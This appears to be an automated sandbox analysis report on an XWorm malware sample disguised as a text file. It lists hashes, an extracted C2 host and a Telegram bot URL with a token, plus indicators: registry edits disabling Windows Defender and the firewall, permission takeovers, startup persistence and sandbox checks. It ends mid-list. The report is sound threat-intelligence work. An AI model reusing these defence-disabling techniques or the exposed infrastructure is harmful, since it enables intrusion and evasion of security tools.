Analysis
-
max time kernel
98s -
max time network
458s -
platform
windows11-21h2_x64 -
resource
win11-20250314-en -
resource tags
arch:x64arch:x86image:win11-20250314-enlocale:en-usos:windows11-21h2-x64system -
submitted
21/03/2025, 00:27
Static task
static1
Behavioral task
behavioral1
Sample
READ ME BEFOR OPEN.txt.exe
Resource
win11-20250314-en
General
-
Target
READ ME BEFOR OPEN.txt.exe
-
Size
84KB
-
MD5
5f8d77b4baf223ecde7556b0c1f63c89
-
SHA1
176ca0ebec13e5d80ce348204532612744735107
-
SHA256
159c1154b8553b15f7feebbb129b1a69ce1f24dea85e2837ad84160e1ce6dc5c
-
SHA512
befa25607d25902859dbb339e69d64d89e98264c88e848f2ed2b5c20aa7865b0e05658d4299deeb1aa9e79f3e58c2df61becb53285f857c0dc7a93091f864549
-
SSDEEP
1536:HEe2sHTvN2b4p98BcYCXSg0qMl3nRgt5P7ZJUqAA/WkywGKwkvOWkVqkl:72W0n4lEl3RE5veV2W3
Malware Config
Extracted
xworm
looking-brings.gl.at.ply.gg:65381
-
Install_directory
%LocalAppData%
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot8074871433:AAGd-vCZQOlCC_n2SUFT-qQ6fFThcBVDd1Y
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/files/0x001900000002b213-37.dat disable_win_def -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x004c00000002b154-7.dat family_xworm behavioral1/memory/5888-30-0x0000000000A30000-0x0000000000A4A000-memory.dmp family_xworm -
Disables service(s) 3 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies security service 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Xworm family
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2344 bcdedit.exe 3944 bcdedit.exe 5804 bcdedit.exe 484 bcdedit.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5484 powershell.exe 4632 powershell.exe 6076 powershell.exe 6128 powershell.exe 4392 powershell.exe 4928 powershell.exe 6032 powershell.exe 4560 powershell.exe 4176 powershell.exe 4608 powershell.exe 1612 powershell.exe 4936 powershell.exe 4360 powershell.exe 2392 powershell.exe 2400 powershell.exe 3776 powershell.exe 5516 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Manipulates Digital Signatures 1 TTPs 15 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe -
Modifies Windows Firewall 2 TTPs 4 IoCs
pid Process 5996 netsh.exe 1416 netsh.exe 888 netsh.exe 5768 netsh.exe -
Possible privilege escalation attempt 32 IoCs
pid Process 2924 takeown.exe 4228 icacls.exe 1352 icacls.exe 4832 takeown.exe 4300 takeown.exe 3128 takeown.exe 4496 takeown.exe 1248 takeown.exe 4612 takeown.exe 5188 icacls.exe 2276 icacls.exe 3068 takeown.exe 2844 icacls.exe 3128 icacls.exe 4332 icacls.exe 4196 takeown.exe 916 takeown.exe 5776 takeown.exe 4060 takeown.exe 5400 takeown.exe 5480 icacls.exe 4816 icacls.exe 3772 takeown.exe 2856 icacls.exe 3804 takeown.exe 1836 takeown.exe 2020 icacls.exe 4816 icacls.exe 1140 takeown.exe 5144 icacls.exe 3584 icacls.exe 4284 takeown.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3540 attrib.exe 4804 attrib.exe -
Stops running service(s) 4 TTPs
-
Drops startup file 6 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk Rasauq SoftWorks.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk Rasauq SoftWorks.exe -
Executes dropped EXE 4 IoCs
pid Process 5888 Rasauq SoftWorks.exe 948 sRasauq SoftWorks.exe 296 Windows Host Service.scr 6696 $77RealtekAudioDriverHost.exe -
Modifies file permissions 1 TTPs 32 IoCs
pid Process 5188 icacls.exe 5480 icacls.exe 2276 icacls.exe 3128 icacls.exe 1352 icacls.exe 3128 takeown.exe 2844 icacls.exe 4816 icacls.exe 2924 takeown.exe 4284 takeown.exe 4332 icacls.exe 5776 takeown.exe 3772 takeown.exe 5144 icacls.exe 5400 takeown.exe 4816 icacls.exe 3068 takeown.exe 4060 takeown.exe 4196 takeown.exe 916 takeown.exe 4300 takeown.exe 1836 takeown.exe 1248 takeown.exe 4612 takeown.exe 2020 icacls.exe 4832 takeown.exe 4496 takeown.exe 4228 icacls.exe 1140 takeown.exe 3804 takeown.exe 3584 icacls.exe 2856 icacls.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" Rasauq SoftWorks.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" reg.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 discord.com 103 discord.com -
Power Settings 1 TTPs 12 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2400 powercfg.exe 5064 powercfg.exe 1728 powercfg.exe 3524 powercfg.exe 592 powercfg.exe 5000 powercfg.exe 2776 powercfg.exe 1504 powercfg.exe 4540 powercfg.exe 3740 powercfg.exe 5992 powercfg.exe 292 powercfg.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File opened for modification C:\Windows\system32\Recovery ReAgentc.exe File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe File opened for modification C:\Windows\System32\Rasauq\$77RasauqBroker.bat cmd.exe File created C:\Windows\System32\$666-RasauqBroker.bat cmd.exe File opened for modification C:\Windows\System32\$666-RasauqBroker.bat cmd.exe File opened for modification C:\Windows\System32\$666-RasauqBroker.bat cmd.exe File created C:\Windows\System32\Rasauq\$77RasauqBroker.bat cmd.exe File opened for modification C:\Windows\System32\Rasauq\$77RasauqBroker.bat cmd.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" reg.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\SystemTemp Process not Found File opened for modification C:\Windows\SystemTemp Process not Found File opened for modification C:\Windows\SystemTemp Process not Found File opened for modification C:\Windows\SystemTemp Process not Found File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\SystemTemp msedge.exe File opened for modification C:\Windows\SystemTemp Process not Found File opened for modification C:\Windows\SystemTemp Process not Found -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 244 sc.exe 2688 sc.exe 5736 sc.exe 3672 sc.exe 3260 sc.exe 2264 sc.exe 4896 sc.exe 396 sc.exe 2252 sc.exe 4172 sc.exe 3004 sc.exe 2276 sc.exe 3984 sc.exe 4676 sc.exe 3160 sc.exe 2784 sc.exe 4060 sc.exe 3736 sc.exe 1144 sc.exe 5360 sc.exe 2168 sc.exe 3660 sc.exe 3712 sc.exe 6000 sc.exe 3736 sc.exe 3740 sc.exe 4624 sc.exe 5100 sc.exe 4392 sc.exe 1580 sc.exe 3888 sc.exe 5160 sc.exe 5952 sc.exe 3920 sc.exe 3824 sc.exe 4104 sc.exe 5748 sc.exe 4548 sc.exe 2916 sc.exe 2544 sc.exe 4284 sc.exe 3532 sc.exe 5028 sc.exe 3844 sc.exe 424 sc.exe 2112 sc.exe 1756 sc.exe 5616 sc.exe 2352 sc.exe 1140 sc.exe 3192 sc.exe 1136 sc.exe 3768 sc.exe 5984 sc.exe 2008 sc.exe 5192 sc.exe 3192 sc.exe 5992 sc.exe 2440 sc.exe 4488 sc.exe 3656 sc.exe 5068 sc.exe 3572 sc.exe 5096 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened 